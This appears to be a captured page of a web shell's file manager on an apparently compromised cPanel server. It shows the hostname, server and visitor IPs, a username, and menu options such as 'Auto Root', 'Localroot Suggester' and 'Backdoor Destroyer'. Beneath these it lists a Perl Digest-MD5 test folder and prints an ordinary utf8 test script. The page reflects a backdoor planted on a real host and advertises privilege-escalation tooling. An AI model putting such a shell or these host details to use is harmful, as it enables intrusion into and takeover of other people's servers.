Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
Digest-MD5 /
t /
Delete
Unzip
Name
Size
Permission
Date
Action
align.t
334
B
-r--r--r--
2014-12-27 11:48
badfile.t
329
B
-r--r--r--
2014-12-27 11:48
bits.t
468
B
-r--r--r--
2014-12-27 11:48
clone.t
796
B
-r--r--r--
2014-12-27 11:48
files.t
3.9
KB
-r--r--r--
2014-12-27 11:48
md5-aaa.t
86.17
KB
-r--r--r--
2014-12-27 11:48
threads.t
500
B
-r--r--r--
2014-12-27 11:48
utf8.t
1.14
KB
-r--r--r--
2014-12-27 11:48
Save
Rename
#!perl -w BEGIN { if ($] < 5.006) { print "1..0 # Skipped: your perl don't know unicode\n"; exit; } } print "1..5\n"; use strict; use Digest::MD5 qw(md5_hex); my $str; $str = "foo\xFF\x{100}"; eval { print md5_hex($str); print "not ok 1\n"; # should not run }; print "not " unless $@ && $@ =~ /^(Big byte|Wide character)/; print "ok 1\n"; my $exp = ord "A" == 193 ? # EBCDIC "c307ec81deba65e9a222ca81cd8f6ccd" : "503debffe559537231ed24f25651ec20"; # Latin 1 chop($str); # only bytes left print "not " unless md5_hex($str) eq $exp; print "ok 2\n"; # reference print "not " unless md5_hex("foo\xFF") eq $exp; print "ok 3\n"; # autopromotion if ($] >= 5.007003) { my $unistring = "Oslo.pm har sosialt medlemsmøte onsdag 1. April 2008, klokken 18:30. Vi treffes på Marhaba Café, Keysersgate 1."; require Encode; $unistring = Encode::decode_utf8($unistring); print "not " if ( not utf8::is_utf8($unistring)); print "ok 4\n"; md5_hex($unistring, ""); print "not " if ( not utf8::is_utf8($unistring)); print "ok 5\n" } else { print "ok 4 # SKIP Your perl is too old to properly test unicode semantics\nok 5 # SKIP No, really\n"; }